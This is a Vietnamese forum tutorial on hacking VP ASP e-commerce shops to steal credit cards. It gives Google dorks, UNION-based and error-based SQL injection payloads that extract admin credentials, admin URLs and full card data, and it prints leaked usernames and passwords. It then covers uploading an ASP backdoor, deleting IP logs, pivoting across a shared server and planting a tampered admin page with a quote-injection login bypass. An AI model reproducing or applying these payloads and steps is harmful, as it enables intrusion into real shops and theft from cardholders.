PVA – My collection

Những ai mới tập hack đều chơi VP ASP trước , shop dạng này bây giờ tuy khó mà kiếm được hàng ngon nhưng anh em cứ thực hành để tích lũy kinh nghiệm. Hơn nữa cấu trúc DB của VP ASP ta biết rõ , việc truy vẫn sẽ dễ dàng hơn.

Ok , nói về VP ASP trước nhá (Châm điếu thuốc cái đã…hehehe)

Hiểu sơ về các table của VP ASP nhé , tất cả table của nó đây :

Trích dẫn:

Activity affiliatelog affiliates billing categories configuration configuration1 Contact coupons customerprices customers downloads gifts GroupMembers Groups hackers languages mycompany oitems orders ordertracking Organization OrganizationActivity pinnumbers prodcategories prodfeatures products projects quantitydiscounts registrant registryitems reviews savedcarts searchresults shipmethods smclads smclcategory smclfavorites smclgetnotified smclicons smclimages smclorders smclpreferences smcltest smcltransactions smumblockedemailids smumgroups smummaillist smumpreferences smumtest smumusergroups smumuserlogs smusermanager suppliers tbl_medi0001 tblaccess tbllog tbluser templates xlaAFPforms xlaAFPiUsersForms xlaAFPsubmissions xlaAFPusers xlaALSBusy xlaALSCans xlaALSCustomers xlaALSDepts xlaALSiDeptsCans xlaALSiUsersCans xlaALSiUsersDepts xlaALSRequests xlaALSUsers xlaALSVisitors xlaAPManswers xlaAPMiPollsPerZone xlaAPMpolls xlaAPMquestions xlaAPMreplies xlaAPMvotes xlaAPMzones

Những table đáng chú ý để anh em khai thác là : tbluser , orders , configuation

*** Sử dụng Google để search với từ khóa sau :

allinurl : “shopdisplayproducts.asp?id=
allinurl : “shopaddtocart.asp?id=
allinurl : “shoptellafriend.asp?id=
allinurl : “shopexd.asp?id=
……….

Thêm ‘ vào sau để check lỗi , nếu id không thấy lỗi thì chuyển sang cat .

Có hai dạng lỗi sau :

1. JET Database

VD : hxxp://www.amf-christian-videos.com/shop/shopdisplayproducts.asp?id=27′

Trích dẫn:

Microsoft JET Database Engine error ‘80040e14′ Syntax error in string in query expression ‘cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and cc.intcategoryid = 27′ and hide=0 order by specialoffer desc,cname’. /shop/shop$db.asp, line 424

*** User và pas admin . Table khai thác : tbluser. ****

Sử dụng câu lệnh Union

%20union%20%20select%201,2,3,4,5,6,7,8,9….%20fro m%20tbluser%27

Vấn đề đối với lỗi này là việc thêm số , hơi mất thời gian. Kinh nghiệm bản thân emily cho thấy shop hay bị dính lỗi ở những line này và số column tương ứng , anh em gặp cứ điền đúng số là ra.

Trích dẫn:

line191 –>> 56 line184 –>> 47,43,53 line188 –>> 53,56, 60 line191 –>> 48 line185 –>> 86,43 line202 –>> 84,91 line208 –>> 48,57 line64 –>> 53 line62—>>37 line67—>>48,53 line211 –>> 43 line59 –>> 70 line58 –>> 37,43,57 line 60 –>>47,48,49 ,53,50,56,60,85 line 57 –>> 37,38,58 line 916 –>>>37 line 930 —>>37 line476–>>>47 line 47–>>30 line912—->>37 line467—->>47 line61—>>53 line53—->>34,35 line 467 —–> 47 line 468 ——> 47 line 469 ——-> 48 line191 — 56 line184 — 47,43,53 line188 — 53,56 line191 — 48 line185 — 86,43 line202 — 84,91 line208 — 48,57 line64 — 53 line211,187 — 43 line59 — 70 line 467 —–>47 line465—–47 line 468 ——> 47 line 469 ——-> 48 line 876–>>43

Như cái shop ở trên:
Line 424 , điền đến số 43 nhé :

Trích dẫn:

htxp://www.amf-christian-videos.com/shop/shopdisplayproducts.asp?id=27%20union%20%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 ,37,38,39,40,41,42,43%20from%20tbluser%27

Hiện ra cái bảng dễ thương nhé ,chú ý ba số 3 , 4 ,22, khai thác user và pass của admin nào :
Chèn fldusername%2b’%20//%20′%2bfldPassword vào một trong ba số đó .

Trích dẫn:

htxp://www.mountieshop.com/shopdisplayproducts.asp?id=46%20union%20%20select% 201,2,fldusername%2b’%20//%20′%2bfldPassword,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34,35,36,37,38,%2039,40,41,42,43,44,45,46,47,48 %20from%20tbluser%27

Lấy được user và pass nhé :

Trích dẫn:

amy // goofball159 mike // wmdwjwd159 ray // littleandi159 sheila // hidavid159

*** Link admin . Table cần khai thác : configuration ****

Trích dẫn:

htxp://www.amf-christian-videos.com/shop/shopdisplayproducts.asp?id=27%20union%20%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 ,37,38,39,40,41,42,43%20from%20configuration%27

Chèn fieldname%2b%27/%27%2bfieldvalue vào số 3 như trên:

Trích dẫn:

htxp://www.amf-christian-videos.com/shop/shopdisplayproducts.asp?id=27%20union%20%20select% 201,2,fieldname%2b%27/%27%2bfieldvalue,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39,40,41,42,43%20from%20configurat ion%27

Nó vẫn ra vậy , nhưng hãy nhìn vị trí số 3 , có khoảng hơn 10 page , hãy view từng page và tìm giá trị tương ứng với xadminpage nhé . Ở đây là :

Trích dẫn:

xadminpage/shopadmin.asp

Login đi nào :

Trích dẫn:

htxp://www.amf-christian-videos.com/shop/shopadmin.asp

Rất hay gặp shop bị mắc lỗi ở file shopdisplayproducts.asp cũng sẽ dính ở shopexd.asp , anh em chuyển sang file nay` :

Trích dẫn:

hxtp://www.amf-christian-videos.com/shop/shopexd.asp?id=27′

Lối thường gặp đối với file này chỉ quanh quẩn các line 57,58,60…Thời gian hack sẽ nhanh hơn vì đã có sẵn số cần thêm. Đến khi hiện ra số 27 (đôi khi 28 , 47 , 48.. ) có cái màu đỏ hoặc xanh dễ mến thì làm như trên nhé , chú ý thay vào số 27 chứ kô phải 3 , 4 hay 22.

Trường hợp gặp shop 2 pass .

VD : htxp://www.xxxxxxx.com/shopexd.asp?id=46

Pass thứ hai không phải là biến mà là hằng nên không thể truy vấn trực tiếp nó đươc,ý đồ của ta là ta phải view file admin mới xem được .

Code:

Trích dẫn:

%20union%20%20select%201,2,fieldname,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, fieldvalue,28,29,30,31,32,33,34,35,36,37,38,%2039, 40,41,42,43,44,45,46,47,48%20from%20configuration% 27

Chú ý dòng đầu tiên của cái mớ bòng bong hiện ra đó .

Trích dẫn:

SecondPassword=”exit_all”

Tỉ lệ lấy được pass2 không 100% , một số shop change table config . Trường hợp này anh em get CC trưc tiếp . Chèn đoạn sau vào số 3 như trên :

Trích dẫn:

ocardtype%2b’—’%2bocardno%2b’—’%2boauthorization%2b’—’%2bocardexpires%2b’—’%2bofirstname%2b’—’%2bolastname%2b’—’%2boaddress%2b’—’%2bocity%2b’—’%2bostate%2b’—’%2bopostcode%2b’—’%2bocountry%2b’—’%2boemail%2b’—’%2bophone

Nếu không hiện hết được ccinffo thì cắt nó ra cho vào hai hoặc ba số 3 ,4 ,22….Thế nhé !

2. Lỗi SQL

Trích dẫn:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′ [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ”. /shopping/$.asp, line 365

Đỗi với lỗi này thì hack nhanh hơn , ta truy vấn ngay để biết xem shop có cvv hay không hay shop bị mã hóa.

Code lấy CC trực tiếp :

Trích dẫn:

%20or%201=convert(int,(select%20top%201%20convert( varchar,isnull(convert(varchar,orderid),’NULL’))%2 b’%20[emily]%20′%2bconvert(varchar,isnull(convert(varchar,odat e),’NULL’))%2b’%20[emily]%20′%2bconvert(varchar,isnull(convert(varchar,ocar dtype),’NULL’))%2b’%20[emily]%20′%2bconvert(varchar,isnull(convert(varchar,ocar dno),’NULL’))%2b’%20[emily]%20′%2bconvert(varchar,isnull(convert(varchar,ocar dexpires),’NULL’))%2b’%20[emily]%20′%2bconvert(varchar,isnull(convert(varchar,oaut horization),’NULL’))%2b’%20[emily]%20′%2bconvert(varchar,isnull(convert(varchar,ocar dname),’NULL’))%2b’%20[emily]%20′%2bconvert(varchar,isnull(convert(varchar,ocar daddress),’NULL’))%2b’%20[emily]%20′%2bconvert(varchar,isnull(convert(varchar,ofir stname),’NULL’))%2b’%20[emily]%20′%2bconvert(varchar,isnull(convert(varchar,olas tname),’NULL’))%2b’%20[emily]%20′%2bconvert(varchar,isnull(convert(varchar,oadd ress),’NULL’))%2b’%20[emily]%20′%2bconvert(varchar,isnull(convert(varchar,ocit y),’NULL’))%2b’%20[emily]%20′%2bconvert(varchar,isnull(convert(varchar,osta te),’NULL’))%2b’%20[emily]%20′%2bconvert(varchar,isnull(convert(varchar,opos tcode),’NULL’))%2b’%20[emily]%20′%2bconvert(varchar,isnull(convert(varchar,ocou ntry),’NULL’))%2b’%20[emily]%20%20′%2bconvert(varchar,isnull(convert(varchar,o phone),’NULL’))%2b’%20[emily]%20′%2bconvert(varchar,isnull(convert(varchar,oema il),’NULL’))%20from%20orders))–sp_password

Nếu OK thì khai thác admin vào quậy chơi.

User and pass :

Trích dẫn:

%20and%201=convert(int,(select%20top%201%20flduser name%2b’ // ‘%2bfldPassword%20from%20tbluser))–sp_password

Link admin :

Trích dẫn:

%20and%201=convert(int,(select%20top%201%20fieldna me%2b’%20//%20′%2bfieldvalue%20from%20configuration%20where%2 0fieldname%20not%20in%20(‘affallowaffiliatesreview orders’,'affcommissionincludesallorders’,'affcommi ssionIncludesshipping’,'affcommissionrate’,'affdir ecturl%20′,’affinfourl’,'affpaymenttypes’,%20′affs ubject’,%20′afftemplateaffiliate’,'afftemplateMerc hant’,'affwebsite%20′,’xaddcatalogid’,'xaddproduct subcategorybycategory’,'xaddproductsupplierdropdow n’,'xadminmenucheck’,'xadminrestrictproducts’)))–sp_password

Thật gọn nhẹ đúng không ??!!!

Vào được shop rồi , có CVV hay không …hên xui , làm gì tiếp đây ??!!

1.Gặp shop nhiều orders mà nó buy qua paygate mới đau ! Anh em vào coniguration của shop chỉnh lại cho nó orders trực tiếp qua shop và tranh thủ vào trước admin để get CVV xài ngay. Cái này chỉ là hạ sách khi đói lòng thôi , vì trước sau gì nó cũng biết . Có lần tôi với thằng admin chơi trò mèo vờn chuột trong shop cũng vui , sau tức quá del mẹ hết nó đi cho ghét , hehehe !

2.Anh em vào nhớ khi ra thì vào Log HIstory del IP log của mình đi nhé , thấy IP nào lạ lạ check luôn, thấy cái nào của VN thì coi như có thegf ngu nòa đó xơi rồi , cho nò die luôn.

Bây giờ tìm cách chơi lên server , cái này mới là quan trọng. Xin trích lại bài của Yami cho anh em tham khảo , him ấy viết cũng đã đầy đủ rồi.
Nghe thì ghê gớm lắm xong lại rất đơn giản. Bạn vào mục Display Products và Edit bất kì một sản phẩm nào. Kéo xuống, bạn sẽ thấy dòng chữ upload images, click vào đó. Hoặc nếu không thấy, vì thăng chủ shop hơi bị khôn thì dán page này vào: shopa_upload.asp Sau đó bấm Browse… và chọn 1 con backdoor từ máy của bạn để úp lên server của nó. Nhớ là backdoor ASP nhé .

Dạo này thằng chủ shop cũng có nhiều đứa khôn lắm, nên có thể up thành công hoặc không. Upload thành công thì nó sẽ báo là Upload has been sucess… và bên dưới là đường dẫn chứa backdoor của bạn, copy và dán lên url rồi….

Lên server rồi thì tự mò nha, cũng dễ thôi …

Mà mục đích lên server là gì nhỉ? Là để tìm kiếm nhữ site shop khác cũng thuê chỗ tại server đó. Bạn sẽ có quyền tải file, dựa vào khả năng phán đoán bạn sẽ biết nó cất csdl ở đâu và down về. Khi up con này lên server rồi, thì bạn bấm up để trở ra thư mục lớn hơn, rồi nhìn lên url, bạn sẽ thấy nguyên cái đường dẫn, bạn thay đổi đường dẫn… cứ tưởng tượng đơn giản, đó là cái máy tính của bạn vậy.

Sau khi các bạn lên server, và tìm được thư mục chứa các website thì công việc tiếp theo là phải tìm cho được đâu là cái shop để tiếp tục kiếm cici

Nếu như nó đặt tên thư mục cho mỗi site là tên gợi nhớ (domain của site) thì chắc hẳn các bạn dễ dàng gõ vào address của trình duyệt cái domain của site đó và biết nó có phải là 1 shop hay không! Nhưng nó lại không thích đặt vậy, mà lại đánh kí tự số cho từng site, hoặc đặt tên lung tung thì bạn làm thế nào để biết được domain của nó là gì? Nếu như phải down 1 vài page về, nhìn vào baner hay hình ảnh nào đó hoặc phần copyright có thể có tên miền thì quả thật là hơi mất thời gian và có thể là không tìm thấy.

Cách hữu hiệu nhất, đơn giản nhất và tốt nhất là bạn nên sử dụng google. Download 1 page về, copy phần copyright hoặc phần đặc trưng của site vào ô search của google. Bấm enter, bạn sẽ thấy được … trang bạn cần tìm.
Hoặc vào google gõ cú pháp sau:

“cụm từ đặc trưng trong page” inurl:[tên của page bạn down về]

Okie, thế là đã tìm được tên miền, và hãy tìm xem có shop nào không? Khi đã tìm ra 1 shop, dù cho shop đó cất kĩ database đến đâu, hay không có lỗi, bạn vẫn có thể lấy cc của nó được

Ví dụ, mình tìm được 1 thư mục tên A có chứa site shop. Vào trong thư mục đó, 1 là bạn có thể tìm thấy database và down về, xong nếu không thể lấy được thì hãy tìm page login admin của nó! Bạn đang ở trên server mà, nên việc tìm page của admin cũng không khó lắm. Khi đã tìm ra, username và pass ở đâu để bạn có thể đăng nhập nhỉ ??? Và shop này không hề có lỗi nào.

Đầu tiên bạn hãy down cái page admin về. Bấm vào dòng chữ “MASS TEST IN…” của con backdoor, nó sẽ liệt kê cho bạn thấy những thư mục nào bạn có thể upload file. Nhưng trước khi upload, bạn hãy sửa lại mã nguồn ở page admin.

Xác định thư mục bạn sẽ upload. Tìm trong page admin (đã save về máy và đã mở mã nguồn lên) xem có dòng include … thì thay đường dẫn cho thích hợp, để từ thư mục bạn sẽ up lên, nó có thể tìm thấy file mà bạn include. Tiếp đến tìm tù này: replace

Và bỏ hàm replace đi. Ví dụ trong code: user=replace(username,”’,'”‘). Bỏ dòng này đi, tương tự đối với những chỗ khác, tuy nhiên bạn cần phải linh hoạt hơn. Có những shop viet code sử dụng hảm replace như sau: Select * from tbl where replace(user,”’,'”‘)… Nếu như thế này thì bạn bỏ cái hàm replace thôi, và sẽ thành đoạn code như sau: select * from tbl where user…

Xong xuôi rồi thì save lại và up lên thư mục bạn đã chọn.

Ví dụ domain của shop đó là: hxxp://yami.com/

link admin chính xác là: hxxp://yami.com/admin.asp

thư mục cho phép up là images.

Link bạn up trang admin giả lên sẽ có dạng: hxxp://yami.com/images/admin.asp

Rồi! Bạn hãy gõ hxxp://yami.com/images/admin.asp vào trình duyệt và thử login

Username: ‘or”=’
Password: ‘or”=’

bấm ok và page not found ^ ^… cái này các bạn đừng lo, vì trong file include nó sẽ chỉ sang 1 trang mà admin đã đăng nhập không phải nằm trong images nên page not found cung chẳng có gì là lạ. Tuy nhiên, máy của bạn đã lưu cookie của admin nên bạn chỉ cần gõ đúng link admin: hxxp://yami.com/admin.asp. Thế là nó tự động chuyển sang trang mà bạn đã login vào admin. Vô được rồi thì… get cc thôi

Tổng hợp từ nhiều nguồn! Đã test cách làm. Thành công. Link vd đã fix security. Vì thế hãy lền gg mà tím shop mới._